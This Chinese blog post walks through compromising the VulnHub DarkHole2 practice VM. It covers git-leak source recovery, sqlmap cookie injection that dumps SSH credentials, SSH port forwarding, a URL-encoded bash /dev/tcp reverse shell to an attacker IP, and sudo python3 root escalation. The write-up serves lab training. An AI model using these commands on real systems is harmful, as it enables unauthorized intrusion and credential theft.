看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole2

简介: 看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole2

d2f235e638f149849d5087ad6a73146c.pngVulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。


Vulnhub靶机下载:

官网链接:https://download.vulnhub.com/darkhole/darkhole_2.zip

Vulnhub靶机安装:


下载好了把安装包解压 然后使用VMware打开即可。

Vulnhub靶机漏洞详解:


①:信息收集:

kali里使用arp-scan -l发现主机

渗透机:kali IP :172.16.5.120 靶机IP :172.16.5.170

使用命令:nmap -sS -sV -T4 -n -p- 172.16.5.170


DarkHole1一样也是开启了2280端口 还是老样子使用Web扫描工具扫描 dirb、dirsearch、whatweb等 发现了git信息泄露



②:Git信息泄露:
git clone https://github.com/lijiejie/GitHack.git  #下载GitHack
python3 GitHack.py http://172.16.5.170/.git  #将源码下载本地
##PS: 我这里kali没网直接复制压缩包进去 都一样的



dc88a35d0cde411c83262b06ec42022d.png


9b3f8891ea2740ec921ae3a7de4ba8b0.png


de6e497fb448408bb5f588d1c18b9114.png

发现好像是数据库的命令,这里需要使用wegt./git 下下载:wget -r http://172.16.5.170/.git

下载了 .git目录后,使用git clone . webapp 命令会将该目录创建一个webapp的源码文件,可以在其中执行所有 git 操作。


然后执行 git log 发现git日志当中存在修改记录,切换到该条记录下进行修改将 HEAD切换到master

git checkout a4d9
cat login.php


9feeb71319f0444c9551733803369bd2.png32c95a3aeb0546feab70cca9a45b6046.png


得到密码为:lush@admin.com/321 尝试登入 发现登入成功!!!!



③:SQL注入:

发现网页URLid存在可能存在SQL注入可以直接使用sqlmap工具,F12获取网页cookie值:PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4


6cc6b8ff1ca34a97ba51918c3e128321.png

56b8a2c4aed04722bb8ea7970a7f7944.png

sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4"  --batch  #存在漏洞

46ae81b65fe9474b8fdfc3d27c3a7910.png

sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4"  --batch  --current-db ##列出数据库


4be645af471640feba8ee016c02431b4.png

sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4"  --batch  -D darkhole_2 --tables ##列出表


1d49fea625624b008cdc78b4059e21a6.png

 sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4"  --batch  -D darkhole_2 -T  ssh --dump ##获取内容

bef1972f623740f995801f2506ac1c60.png


得到了账号密码:jehad/fool 尝试SSH登入!!

④:SSH登入:

⑤:漏洞利用&提权:
sudo -l
find / -user root -perm -4000 -print 2>/dev/null  #查看有没有 SUID 文件可以利用
cat .bash_history #查看历史文件  
cat /etc/crontab #查看定时任务


5a357f9359c541b5ad52a7d7d4796e67.png


b9bceddadaad4573a3aee573f2b2a2ac.png


31112028e2954383abcc51d795ddaf81.png

026fc40e86fb4845a1829ff4d6529fa8.png


存在一个Web 9999端口 访问不了 尝试端口转发到本地:ssh -L 9999:127.0.0.1:9999 jehad@172.16.5.170

历史记录里面有查看id命令 发现是losy用户的普通权限 可以开启nc 监听 反弹shell



PS:因为我在学校没做完 回家接着做所以这里的ip变了 但是不影响

bash -c 'sh -i >& /dev/tcp/192.168.0.126/7777 0>&1' #因为这里是GET传参 所以需要url编码
bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.0.126/7777%200%3E%261%27  
curl http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.0.106/7777%200%3E%261%27
/bin/bash -i
history  #查看历史文件

d2f235e638f149849d5087ad6a73146c.png

743ddbc8695a4bebaa114a22227286d9.png

f718fc1a91284e429227a0f0ece6e440.png

b67b1364f6b5425a9cbe221fbc81de06.png


可以看到提权命令以及losy用户密码:gang然后SSH登入!! sudo -l 查看 有sudo权限

sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'  ###提权


e2c3e9bb31ca4c2cb069415b72864143.png


⑥:获取FLAG:

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!


Vulnhub靶机渗透总结:


这个靶机难度适中

1.信息收集 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb等‘

2.sqlmap工具cookie注入 获取信息

3.这里需要主要的 端口转发 如果这个失败了 后面执行 curl是失败的 这里卡了一会不然弹不上

4.GET 传参 url编码 最后就是提权了sudo提权。


这个系列的两篇完结啦!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
4月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
57 4
|
4月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
62 4
|
4月前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
48 2
|
5月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
62 0
|
5月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
65 0
|
9月前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
241 0
|
9月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
161 0
|
1月前
|
数据可视化 前端开发 测试技术
接口测试新选择:Postman替代方案全解析
在软件开发中,接口测试工具至关重要。Postman长期占据主导地位,但随着国产工具的崛起,越来越多开发者转向更适合中国市场的替代方案——Apifox。它不仅支持中英文切换、完全免费不限人数,还具备强大的可视化操作、自动生成文档和API调试功能,极大简化了开发流程。
|
5天前
|
JSON 前端开发 测试技术
大前端之前端开发接口测试工具postman的使用方法-简单get接口请求测试的使用方法-简单教学一看就会-以实际例子来说明-优雅草卓伊凡
大前端之前端开发接口测试工具postman的使用方法-简单get接口请求测试的使用方法-简单教学一看就会-以实际例子来说明-优雅草卓伊凡
45 10
大前端之前端开发接口测试工具postman的使用方法-简单get接口请求测试的使用方法-简单教学一看就会-以实际例子来说明-优雅草卓伊凡
|
3天前
|
JSON 前端开发 API
以项目登录接口为例-大前端之开发postman请求接口带token的请求测试-前端开发必学之一-如果要学会联调接口而不是纯写静态前端页面-这个是必学-本文以优雅草蜻蜓Q系统API为实践来演示我们如何带token请求接口-优雅草卓伊凡
以项目登录接口为例-大前端之开发postman请求接口带token的请求测试-前端开发必学之一-如果要学会联调接口而不是纯写静态前端页面-这个是必学-本文以优雅草蜻蜓Q系统API为实践来演示我们如何带token请求接口-优雅草卓伊凡
25 5
以项目登录接口为例-大前端之开发postman请求接口带token的请求测试-前端开发必学之一-如果要学会联调接口而不是纯写静态前端页面-这个是必学-本文以优雅草蜻蜓Q系统API为实践来演示我们如何带token请求接口-优雅草卓伊凡